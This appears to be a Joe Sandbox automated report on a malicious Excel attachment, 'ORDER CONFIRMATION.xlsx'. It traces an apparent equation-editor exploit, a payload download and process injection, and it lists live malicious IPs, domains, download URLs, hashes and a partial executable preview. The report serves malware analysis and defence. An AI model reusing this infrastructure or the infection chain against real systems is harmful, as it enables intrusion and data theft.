Command and Control: Encrypted Channel 1; Ingress Tool Transfer 12; Non-Application Layer Protocol 2; Application Layer Protocol 122; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

Behavior Graph

Behavior Graph ID: 483668; Sample: ORDER CONFIRMATION.xlsx; Start date: 15/09/2021; Architecture: WINDOWS; Score: 100

Process tree recovered from the graph (node numbers are the graph's own):

• Start (2): contacts www.thaysay.net, www.thaibinhgear.com and 20 other IPs or domains. Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 16 other signatures.
  • EXCEL.EXE (15), started by 2: drops C:\Users\user\...\~$ORDER CONFIRMATION.xlsx (data).
  • EQNEDT32.EXE (10), started by 2: contacts 198.23.212.143 (ports 49167, 80; AS-COLOCROSSINGUS, United States); drops C:\Users\user\AppData\Local\...\vbc[1].exe (PE32) and C:\Users\Public\vbc.exe (PE32). Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802).
    • vbc.exe (17), started by 10. Signatures: Machine Learning detection for dropped file; Uses ipconfig to lookup or modify the Windows network settings; Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign process.
      • vbc.exe (23), started by 17.
      • vbc.exe (20), started by 17. Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection).
        • ipconfig.exe (25), started by 20. Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements.
          • cmd.exe (31), started by 25.
        • explorer.exe (28), injected by 20: contacts americanstonesusa.com (192.99.131.252, ports 49168, 49183, 49198; OVHFR, Canada), www.realstyleworks.com and 5 other IPs or domains. Signature: System process connects to network (likely due to code injection or exploit).

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
ORDER CONFIRMATION.xlsx | 33% | Virustotal |
ORDER CONFIRMATION.xlsx | 29% | ReversingLabs | Document-Word.Exploit.CVE-2017-11882

Dropped Files

Source | Detection | Scanner | Label
C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 100% | Joe Sandbox ML |

Unpacked PE Files

Source | Detection | Scanner | Label
8.2.vbc.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

      Domains

      No Antivirus matches

      Domains and IPs

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
198.23.212.143 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
34.102.136.180 | plasticplank.com | United States | 15169 | GOOGLEUS | false
34.98.99.30 | realstyleworks.com | United States | 15169 | GOOGLEUS | false
192.99.131.252 | americanstonesusa.com | Canada | 16276 | OVHFR | true

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 483668
Start date: 15.09.2021
Start time: 11:15:16
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 17m 57s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: ORDER CONFIRMATION.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 12
Number of new started drivers analysed: 2
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSX@12/19@22/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 23.7% (good quality ratio 22.8%)
• Quality average: 69.8%
• Quality standard deviation: 28.9%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Max analysis timeout: 600s exceeded, the analysis took too long
• TCP Packets have been reduced to 100
• Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, conhost.exe, svchost.exe
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time | Type | Description
11:15:46 | API Interceptor | 62x Sleep call for process: EQNEDT32.EXE modified
11:15:48 | API Interceptor | 125x Sleep call for process: vbc.exe modified
11:16:22 | API Interceptor | 229x Sleep call for process: ipconfig.exe modified
11:17:11 | API Interceptor | 1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
198.23.212.143 | ORDER CONFIRMATION.xlsx | malicious | 198.23.212.143/restore/vbc.exe
198.23.212.143 | VINASHIP STAR.xlsx | malicious | 198.23.212.143/hkcmd/vbc.exe
198.23.212.143 | MV NORDSPRING.xlsx | malicious | 198.23.212.143/ibm/vbc.exe
192.99.131.252 | UiUIvFRxA8.exe | malicious | www.americanstonesusa.com/nthe/?pF=TiWkgH4RkF7GI6/xmtcRQySnot/hSP0U84AJ42MHKZz+hx9kgl2ssvJW7++40TiQRwdDqjcF6A==&OZU=kh_XEVoH4
192.99.131.252 | IDol28opjZ.exe | malicious | www.americanstonesusa.com/nthe/?Uzrhst=U4UTr&JBth_0D=TiWkgH4RkF7GI6/xmtcRQySnot/hSP0U84AJ42MHKZz+hx9kgl2ssvJW79Sooi+rWF0S

Domains

Match | Associated Sample Name / URL | Detection | Context
www.aedenpure.com | QYUNlRkkn1.exe | malicious | 217.160.0.177
www.tomrings.com | SKMBT69150632L.exe | malicious | 162.0.214.58
www.tomrings.com | New Order Vung Ang TPP Viet Nam.exe | malicious | 162.0.214.58
www.tomrings.com | statement.exe | malicious | 162.0.214.58
www.tomrings.com | Ohki Blower Skid Base Enquiry 052521.exe | malicious | 162.0.214.58
www.tomrings.com | Wire Payment Of $35,276.70.exe | malicious | 162.0.214.58
cname.landingi.com | 0OBKA8AwTn.exe | malicious | 54.77.19.84
cname.landingi.com | ZbpMqzUXVN.exe | malicious | 108.128.238.226
cname.landingi.com | PO_IMG_13072021_item.exe | malicious | 52.212.68.12
cname.landingi.com | 47mAsp9IER.exe | malicious | 54.77.19.84
cname.landingi.com | U03c2doc.exe | malicious | 108.128.238.226
cname.landingi.com | scan-copy059950059pdf.exe | malicious | 108.128.238.226
cname.landingi.com | SKMBT_C224307532DL23457845_Product Order doc.exe | malicious | 108.128.238.226
cname.landingi.com | Descripciones de oferta de productos MACIILIAS SRL doc.exe | malicious | 54.77.19.84
cname.landingi.com | a449cc12_by_Libranalysis.exe | malicious | 52.212.68.12
cname.landingi.com | Dokument Nota odbiorcza IMI FFPT-2019223912003_2021 doc.exe | malicious | 108.128.238.226
cname.landingi.com | Documento de transfer#U00eancia banc#U00e1ria _2021doc.exe | malicious | 52.212.68.12
cname.landingi.com | TSVINCCU21021642.exe | malicious | 52.212.68.12
cname.landingi.com | SWIFT COPY.exe | malicious | 54.77.19.84
cname.landingi.com | SWIFT COPY.exe | malicious | 54.77.19.84
cname.landingi.com | PROFORMA INVOICE.exe | malicious | 108.128.238.226
cname.landingi.com | 8sxgohtHjM.exe | malicious | 108.128.238.226
cname.landingi.com | yQh96Jd6TZ.exe | malicious | 54.77.19.84
cname.landingi.com | Paymonth invoice.exe | malicious | 54.77.19.84
cname.landingi.com | Product list.xlsx | malicious | 108.128.238.226
cname.landingi.com | WaybillDoc_6848889025.xlsx | malicious | 108.128.238.226

ASN

Match | Associated Sample Name / URL | Detection | Context
AS-COLOCROSSINGUS | Pedido.xlsx | malicious | 172.245.26.190
AS-COLOCROSSINGUS | #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx | malicious | 23.95.85.181
AS-COLOCROSSINGUS | 09142021_PDF.vbs | malicious | 23.94.82.41
AS-COLOCROSSINGUS | Swift Mt103.xlsx | malicious | 23.95.13.175
AS-COLOCROSSINGUS | vkb.xlsx | malicious | 192.3.13.11
AS-COLOCROSSINGUS | Transfer Swift.xlsx | malicious | 172.245.26.190
AS-COLOCROSSINGUS | ORDER 5172020.xlsx | malicious | 198.12.84.109
AS-COLOCROSSINGUS | REF_MIDLGB34.xlsx | malicious | 23.94.159.208
AS-COLOCROSSINGUS | proforma invoice.xlsx | malicious | 192.3.141.149
AS-COLOCROSSINGUS | Swift_Mt103.xlsx | malicious | 23.95.13.175
AS-COLOCROSSINGUS | PO-80722 .xlsx | malicious | 198.12.84.109
AS-COLOCROSSINGUS | MT103-Swift Copy.xlsx | malicious | 198.46.199.203
AS-COLOCROSSINGUS | Items_quote.xlsx | malicious | 172.245.26.145
AS-COLOCROSSINGUS | Usd_transfer.xlsx | malicious | 172.245.26.145
AS-COLOCROSSINGUS | REF_MIDLGB34.xlsx | malicious | 23.94.159.208
AS-COLOCROSSINGUS | ORDER RFQ1009202.xlsx | malicious | 23.95.85.181
AS-COLOCROSSINGUS | msn.xlsx | malicious | 198.12.127.217
AS-COLOCROSSINGUS | swift.xlsx | malicious | 198.46.199.171
AS-COLOCROSSINGUS | Additional Order Qty 197.xlsx | malicious | 198.12.107.117
AS-COLOCROSSINGUS | DHL Cargo Arrival.xlsx | malicious | 172.245.26.190
OVHFR | qy2t7MIRoi.exe | malicious | 92.222.145.236
OVHFR | ORDER 5172020.xlsx | malicious | 144.217.61.66
OVHFR | zB34E25PZM.exe | malicious | 87.98.185.184
OVHFR | USD INV#1191189.xlsx | malicious | 213.186.33.5
OVHFR | mips | malicious | 54.37.203.235
OVHFR | lEsEX3McwH.exe | malicious | 51.254.69.209
OVHFR | 5cv9ajEWlI | malicious | 51.79.103.19
OVHFR | oAQ0OaThsM | malicious | 213.251.181.247
OVHFR | ORDER 5172020.xlsx | malicious | 144.217.61.66
OVHFR | New_PO0056329.xlsx | malicious | 164.132.216.38
OVHFR | Z9GkJvygEk.exe | malicious | 149.56.94.218
OVHFR | RZAcKBlQo0.exe | malicious | 51.89.143.152
OVHFR | F1MwWrwBR7.exe | malicious | 51.89.143.157
OVHFR | Ernest_Skye_Mitchell.html | malicious | 167.114.119.127
OVHFR | mDkCoW1yzV.exe | malicious | 51.89.96.41
OVHFR | Payment voucher. pdf.................gz.exe | malicious | 51.222.134.241
OVHFR | 5siADx4Pdz.exe | malicious | 51.89.96.41
OVHFR | 9e5SOQ1wPz | malicious | 139.99.135.131
OVHFR | 7LqDcyRJiN | malicious | 139.99.135.131
OVHFR | EEU2sTtvah | malicious | 139.99.135.131

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: downloaded
Size (bytes): 556544
Entropy (8bit): 7.182791197610268
Encrypted: false
SSDEEP: 12288:7WHCM2K4Cz8liFBdgtM6lf2vo45Rm5fv1zCln:h3CzeiDdIMAfEofftzk
MD5: 989933E361010648C467C6D7B6C2D812
SHA1: 3BD47D097B8CD69083445EB0417B0059FA806542
SHA-256: 34A89EDA5DD4AEF3EFB096011F27BBA7354B4C624D5DC01F4B43A18AC42D6AF4
SHA-512: F98B8337F527B49A4E5BD659CD6264D22F43C31EAAB55CCA4BF79EE2C5C5405D5CD78D1176759A0E0287E5FEB82675EF0D73DDA918FB9289ACC9D84DA466C60F
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
IE Cache URL: http://198.23.212.143/ddr/vbc.exe
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6...............0..t.............. ........@.. ....................................@.................................x...O...................................\................................................ ............... ..H............text....s... ...t.................. ..`.rsrc................v..............@..@.reloc...............|..............@..B........................H........?..._......o...................................................~..$}......}......}.....(......*...$}......}......}.....(........}......}....*...0..O.........$}......}......}.....(........{....}......{....}......{....}......{....}....*:..{....(.....*...0..w..........R.{........,f.r...p(....-).r!..p(....-%.r-..p(....-%.r9..p(....-%+0..}....+'..J.{....XT+...J.{....XT+...J.{....XT+.*..0...........rE..p.+..*..0...........r...p.+..*..0..................+..*".(.....*....0..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C03C88C.jpeg
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category: dropped
Size (bytes): 8815
Entropy (8bit): 7.944898651451431
Encrypted: false
SSDEEP: 192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5: F06432656347B7042C803FE58F4043E1
SHA1: 4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256: 409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512: 358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious: false
Reputation: moderate, very likely benign file
Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\24B64F4E.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 84203
Entropy (8bit): 7.979766688932294
Encrypted: false
SSDEEP: 1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5: 208FD40D2F72D9AED77A86A44782E9E2
SHA1: 216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256: CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512: 7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious: false
Reputation: moderate, very likely benign file
Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F791AF7.jpeg
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category: dropped
Size (bytes): 85020
Entropy (8bit): 7.2472785111025875
Encrypted: false
SSDEEP: 768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5: 738BDB90A9D8929A5FB2D06775F3336F
SHA1: 6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256: 8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512: 48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious: false
Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4D4B1A7A.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):49744
                                                                                      Entropy (8bit):7.99056926749243
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                                                                      MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                                                                      SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                                                                      SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                                                                      SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4EA9D4E2.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):14198
                                                                                      Entropy (8bit):7.916688725116637
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                                                      MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                                                      SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                                                      SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                                                      SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6CBE2925.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):8815
                                                                                      Entropy (8bit):7.944898651451431
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                                      MD5:F06432656347B7042C803FE58F4043E1
                                                                                      SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                                      SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                                      SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F46F433.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):33795
                                                                                      Entropy (8bit):7.909466841535462
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                                                                                      MD5:613C306C3CC7C3367595D71BEECD5DE4
                                                                                      SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                                                                                      SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                                                                                      SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7383DB7B.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):49744
                                                                                      Entropy (8bit):7.99056926749243
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                                                                      MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                                                                      SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                                                                      SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                                                                      SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                                                                      Malicious:false
